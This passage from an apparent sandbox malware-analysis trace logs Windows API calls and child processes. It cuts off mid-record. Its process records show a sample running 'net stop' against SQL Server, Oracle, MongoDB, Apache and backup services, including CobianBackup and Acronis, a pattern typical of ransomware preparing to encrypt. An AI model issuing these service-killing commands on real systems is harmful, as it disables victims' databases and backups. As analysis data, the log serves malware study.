[0073.769] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494cc0) returned 1 [0073.769] GetProcessHeap () returned 0x480000 [0073.769] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494cc0) returned 0x10 [0073.769] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495170) returned 1 [0073.769] GetProcessHeap () returned 0x480000 [0073.769] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495170) returned 0x14 [0073.769] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x4951e8) returned 1 [0073.769] GetProcessHeap () returned 0x480000 [0073.769] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x4951e8) returned 0x14 [0073.769] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495228) returned 1 [0073.769] GetProcessHeap () returned 0x480000 [0073.769] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495228) returned 0x14 [0073.769] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495268) returned 1 [0073.769] GetProcessHeap () returned 0x480000 [0073.769] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495268) returned 0x14 [0073.769] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495288) returned 1 [0073.769] GetProcessHeap () returned 0x480000 [0073.769] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495288) returned 0x14 [0073.769] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494cd8) returned 1 [0073.769] GetProcessHeap () returned 0x480000 [0073.769] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494cd8) returned 0x10 [0073.769] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x495208) returned 1 [0073.769] GetProcessHeap () returned 0x480000 [0073.769] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x495208) returned 0x14 [0073.769] HeapValidate (hHeap=0x480000, dwFlags=0x0, lpMem=0x494c90) returned 1 [0073.769] GetProcessHeap () returned 0x480000 [0073.769] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x494c90) returned 0x10 [0073.769] exit (_Code=0) Thread: id = 192 os_tid = 0x934 Process: id = "45" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x7a897000" os_pid = "0xadc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x780" cmd_line = "net stop SQLAgent$SQLEXPRESS" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 168 os_tid = 0xad8 Process: id = "46" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x7808f000" os_pid = "0xad4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0x8f0" cmd_line = "net stop OracleServiceXE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 169 os_tid = 0xad0 Process: id = "47" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1720d000" os_pid = "0x7cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0x80c" cmd_line = "net stop Apache2.4" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 170 os_tid = 0xa0c Process: id = "48" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x7b1ac000" os_pid = "0x8fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0x870" cmd_line = "net stop MSSQLServerADHelper100" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 171 os_tid = 0x888 Process: id = "49" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1730d000" os_pid = "0x998" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x850" cmd_line = "net stop SQLWriter" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 178 os_tid = 0xa08 Process: id = "50" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x7712b000" os_pid = "0x8ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x974" cmd_line = "net stop cbVSCService11" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 172 os_tid = 0x7a4 Process: id = "51" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x7945c000" os_pid = "0x9fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x8d4" cmd_line = "net stop MongoDB" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 173 os_tid = 0x7fc Process: id = "52" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x79697000" os_pid = "0x7e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x94c" cmd_line = "net stop AcrSch2Svc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 174 os_tid = 0xa00 Process: id = "53" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x16b7a000" os_pid = "0x928" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x99c" cmd_line = "net stop CobianBackup11" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 175 os_tid = 0x91c Process: id = "54" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x7a334000" os_pid = "0x9bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0x7d4" cmd_line = "net stop SQLBrowser" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 176 os_tid = 0x840 Process: id = "55" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x7a5b7000" os_pid = "0x330" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0x85c" cmd_line = "net stop MSSQL$SQLEXPRESS" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 177 os_tid = 0x598 Process: id = "56" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0xa8bc000" os_pid = "0x8cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "45" os_parent_pid = "0xadc" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$SQLEXPRESS" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 179 os_tid = 0xc4 [0071.208] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fe58 | out: lpSystemTimeAsFileTime=0x20fe58*(dwLowDateTime=0x992739f0, dwHighDateTime=0x1d57b18)) [0071.208] GetCurrentProcessId () returned 0x8cc [0071.208] GetCurrentThreadId () returned 0xc4 [0071.208] GetTickCount () returned 0x114bb35 [0071.208] QueryPerformanceCounter (in: lpPerformanceCount=0x20fe50 | out: lpPerformanceCount=0x20fe50*=19142988169) returned 1 [0071.209] GetModuleHandleA (lpModuleName=0x0) returned 0xb00000 [0071.209] __set_app_type (_Type=0x1) [0071.209] __p__fmode () returned 0x74eb31f4 [0071.209] __p__commode () returned 0x74eb31fc [0071.209] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb0ffe6) returned 0x0 [0071.209] __getmainargs (in: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068, _DoWildCard=0, _StartInfo=0xb19024 | out: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068) returned 0 [0071.209] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.209] GetConsoleOutputCP () returned 0x1b5 [0071.209] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb19080 | out: lpCPInfo=0xb19080) returned 1 [0071.209] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.529] sprintf_s (in: _DstBuf=0x20fe10, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0071.529] setlocale (category=0, locale=".437") returned="English_United States.437" [0071.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.531] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0071.531] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SQLEXPRESS" [0071.531] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20fbdc, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0071.531] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x0, Size=0x70) returned 0x323bc0 [0071.532] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x20fde0 | out: Buffer=0x20fde0*=0x321c18) returned 0x0 [0071.532] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x20fde0 | out: Buffer=0x20fde0*=0x321c30) returned 0x0 [0071.532] _fileno (_File=0x74eb2900) returned 0 [0071.532] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0071.532] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0071.532] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0071.532] _wcsicmp (_String1="config", _String2="stop") returned -16 [0071.532] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0071.532] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0071.532] _wcsicmp (_String1="file", _String2="stop") returned -13 [0071.532] _wcsicmp (_String1="files", _String2="stop") returned -13 [0071.532] _wcsicmp (_String1="group", _String2="stop") returned -12 [0071.532] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0071.532] _wcsicmp (_String1="help", _String2="stop") returned -11 [0071.532] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0071.532] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0071.532] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0071.532] _wcsicmp (_String1="session", _String2="stop") returned -15 [0071.532] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0071.532] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0071.532] _wcsicmp (_String1="share", _String2="stop") returned -12 [0071.532] _wcsicmp (_String1="start", _String2="stop") returned -14 [0071.532] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0071.532] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0071.532] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0071.532] _wcsicmp (_String1="accounts", _String2="SQLAgent$SQLEXPRESS") returned -18 [0071.532] _wcsicmp (_String1="computer", _String2="SQLAgent$SQLEXPRESS") returned -16 [0071.532] _wcsicmp (_String1="config", _String2="SQLAgent$SQLEXPRESS") returned -16 [0071.533] _wcsicmp (_String1="continue", _String2="SQLAgent$SQLEXPRESS") returned -16 [0071.533] _wcsicmp (_String1="cont", _String2="SQLAgent$SQLEXPRESS") returned -16 [0071.533] _wcsicmp (_String1="file", _String2="SQLAgent$SQLEXPRESS") returned -13 [0071.533] _wcsicmp (_String1="files", _String2="SQLAgent$SQLEXPRESS") returned -13 [0071.533] _wcsicmp (_String1="group", _String2="SQLAgent$SQLEXPRESS") returned -12 [0071.533] _wcsicmp (_String1="groups", _String2="SQLAgent$SQLEXPRESS") returned -12 [0071.533] _wcsicmp (_String1="help", _String2="SQLAgent$SQLEXPRESS") returned -11 [0071.533] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$SQLEXPRESS") returned -11 [0071.533] _wcsicmp (_String1="localgroup", _String2="SQLAgent$SQLEXPRESS") returned -7 [0071.533] _wcsicmp (_String1="pause", _String2="SQLAgent$SQLEXPRESS") returned -3 [0071.533] _wcsicmp (_String1="session", _String2="SQLAgent$SQLEXPRESS") returned -12 [0071.533] _wcsicmp (_String1="sessions", _String2="SQLAgent$SQLEXPRESS") returned -12 [0071.533] _wcsicmp (_String1="sess", _String2="SQLAgent$SQLEXPRESS") returned -12 [0071.533] _wcsicmp (_String1="share", _String2="SQLAgent$SQLEXPRESS") returned -9 [0071.533] _wcsicmp (_String1="start", _String2="SQLAgent$SQLEXPRESS") returned 3 [0071.533] _wcsicmp (_String1="stats", _String2="SQLAgent$SQLEXPRESS") returned 3 [0071.533] _wcsicmp (_String1="statistics", _String2="SQLAgent$SQLEXPRESS") returned 3 [0071.533] _wcsicmp (_String1="stop", _String2="SQLAgent$SQLEXPRESS") returned 3 [0071.533] _wcsicmp (_String1="time", _String2="SQLAgent$SQLEXPRESS") returned 1 [0071.533] _wcsicmp (_String1="user", _String2="SQLAgent$SQLEXPRESS") returned 2 [0071.533] _wcsicmp (_String1="users", _String2="SQLAgent$SQLEXPRESS") returned 2 [0071.533] _wcsicmp (_String1="msg", _String2="SQLAgent$SQLEXPRESS") returned -6 [0071.533] _wcsicmp (_String1="messenger", _String2="SQLAgent$SQLEXPRESS") returned -6 [0071.533] _wcsicmp (_String1="receiver", _String2="SQLAgent$SQLEXPRESS") returned -1 [0071.533] _wcsicmp (_String1="rcv", _String2="SQLAgent$SQLEXPRESS") returned -1 [0071.533] _wcsicmp (_String1="netpopup", _String2="SQLAgent$SQLEXPRESS") returned -5 [0071.533] _wcsicmp (_String1="redirector", _String2="SQLAgent$SQLEXPRESS") returned -1 [0071.533] _wcsicmp (_String1="redir", _String2="SQLAgent$SQLEXPRESS") returned -1 [0071.533] _wcsicmp (_String1="rdr", _String2="SQLAgent$SQLEXPRESS") returned -1 [0071.533] _wcsicmp (_String1="workstation", _String2="SQLAgent$SQLEXPRESS") returned 4 [0071.533] _wcsicmp (_String1="work", _String2="SQLAgent$SQLEXPRESS") returned 4 [0071.533] _wcsicmp (_String1="wksta", _String2="SQLAgent$SQLEXPRESS") returned 4 [0071.533] _wcsicmp (_String1="prdr", _String2="SQLAgent$SQLEXPRESS") returned -3 [0071.533] _wcsicmp (_String1="devrdr", _String2="SQLAgent$SQLEXPRESS") returned -15 [0071.534] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$SQLEXPRESS") returned -7 [0071.534] _wcsicmp (_String1="server", _String2="SQLAgent$SQLEXPRESS") returned -12 [0071.534] _wcsicmp (_String1="svr", _String2="SQLAgent$SQLEXPRESS") returned 5 [0071.534] _wcsicmp (_String1="srv", _String2="SQLAgent$SQLEXPRESS") returned 1 [0071.534] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$SQLEXPRESS") returned -7 [0071.534] _wcsicmp (_String1="alerter", _String2="SQLAgent$SQLEXPRESS") returned -18 [0071.534] _wcsicmp (_String1="netlogon", _String2="SQLAgent$SQLEXPRESS") returned -5 [0071.534] _wcsupr (in: _String="SQLAgent$SQLEXPRESS" | out: _String="SQLAGENT$SQLEXPRESS") returned="SQLAGENT$SQLEXPRESS" [0071.534] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3254a8 [0071.537] GetServiceKeyNameW (in: hSCManager=0x3254a8, lpDisplayName="SQLAGENT$SQLEXPRESS", lpServiceName=0xb1aaf0, lpcchBuffer=0x20fd7c | out: lpServiceName="", lpcchBuffer=0x20fd7c) returned 0 [0071.538] _wcsicmp (_String1="msg", _String2="SQLAGENT$SQLEXPRESS") returned -6 [0071.538] _wcsicmp (_String1="messenger", _String2="SQLAGENT$SQLEXPRESS") returned -6 [0071.538] _wcsicmp (_String1="receiver", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0071.538] _wcsicmp (_String1="rcv", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0071.538] _wcsicmp (_String1="redirector", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0071.538] _wcsicmp (_String1="redir", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0071.538] _wcsicmp (_String1="rdr", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0071.538] _wcsicmp (_String1="workstation", _String2="SQLAGENT$SQLEXPRESS") returned 4 [0071.538] _wcsicmp (_String1="work", _String2="SQLAGENT$SQLEXPRESS") returned 4 [0071.538] _wcsicmp (_String1="wksta", _String2="SQLAGENT$SQLEXPRESS") returned 4 [0071.538] _wcsicmp (_String1="prdr", _String2="SQLAGENT$SQLEXPRESS") returned -3 [0071.538] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$SQLEXPRESS") returned -15 [0071.538] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$SQLEXPRESS") returned -7 [0071.538] _wcsicmp (_String1="server", _String2="SQLAGENT$SQLEXPRESS") returned -12 [0071.539] _wcsicmp (_String1="svr", _String2="SQLAGENT$SQLEXPRESS") returned 5 [0071.539] _wcsicmp (_String1="srv", _String2="SQLAGENT$SQLEXPRESS") returned 1 [0071.539] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$SQLEXPRESS") returned -7 [0071.539] _wcsicmp (_String1="alerter", _String2="SQLAGENT$SQLEXPRESS") returned -18 [0071.539] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$SQLEXPRESS") returned -5 [0071.539] NetServiceControl (in: servername=0x0, service="SQLAGENT$SQLEXPRESS", opcode=0x0, arg=0x0, bufptr=0x20fd78 | out: bufptr=0x20fd78) returned 0x889 [0071.540] wcscpy_s (in: _Destination=0xb1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0071.540] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74200000 [0071.540] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74200000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0071.542] GetFileType (hFile=0xb) returned 0x2 [0071.542] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fc98 | out: lpMode=0x20fc98) returned 1 [0071.542] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x20fcb8, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x20fcb8*=0x1e) returned 1 [0071.543] GetFileType (hFile=0xb) returned 0x2 [0071.543] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fc98 | out: lpMode=0x20fc98) returned 1 [0071.543] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fcb8, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x20fcb8*=0x2) returned 1 [0071.544] _ultow (in: _Dest=0x889, _Radix=2161896 | out: _Dest=0x889) returned="2185" [0071.544] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74200000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0071.544] GetFileType (hFile=0xb) returned 0x2 [0071.544] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fca4 | out: lpMode=0x20fca4) returned 1 [0071.544] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x20fcc4, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x20fcc4*=0x34) returned 1 [0071.545] GetFileType (hFile=0xb) returned 0x2 [0071.545] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fca4 | out: lpMode=0x20fca4) returned 1 [0071.545] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fcc4, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x20fcc4*=0x2) returned 1 [0071.546] NetApiBufferFree (Buffer=0x321c18) returned 0x0 [0071.546] NetApiBufferFree (Buffer=0x321c30) returned 0x0 [0071.546] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SQLEXPRESS" [0071.546] exit (_Code=2) Process: id = "57" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x166e1000" os_pid = "0x694" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "46" os_parent_pid = "0xad4" cmd_line = "C:\\Windows\\system32\\net1 stop OracleServiceXE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 180 os_tid = 0x664 [0071.243] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1dfc88 | out: lpSystemTimeAsFileTime=0x1dfc88*(dwLowDateTime=0x992e5e10, dwHighDateTime=0x1d57b18)) [0071.243] GetCurrentProcessId () returned 0x694 [0071.244] GetCurrentThreadId () returned 0x664 [0071.244] GetTickCount () returned 0x114bb64 [0071.244] QueryPerformanceCounter (in: lpPerformanceCount=0x1dfc80 | out: lpPerformanceCount=0x1dfc80*=19146511500) returned 1 [0071.244] GetModuleHandleA (lpModuleName=0x0) returned 0xb00000 [0071.244] __set_app_type (_Type=0x1) [0071.244] __p__fmode () returned 0x74eb31f4 [0071.244] __p__commode () returned 0x74eb31fc [0071.244] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb0ffe6) returned 0x0 [0071.244] __getmainargs (in: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068, _DoWildCard=0, _StartInfo=0xb19024 | out: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068) returned 0 [0071.244] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, 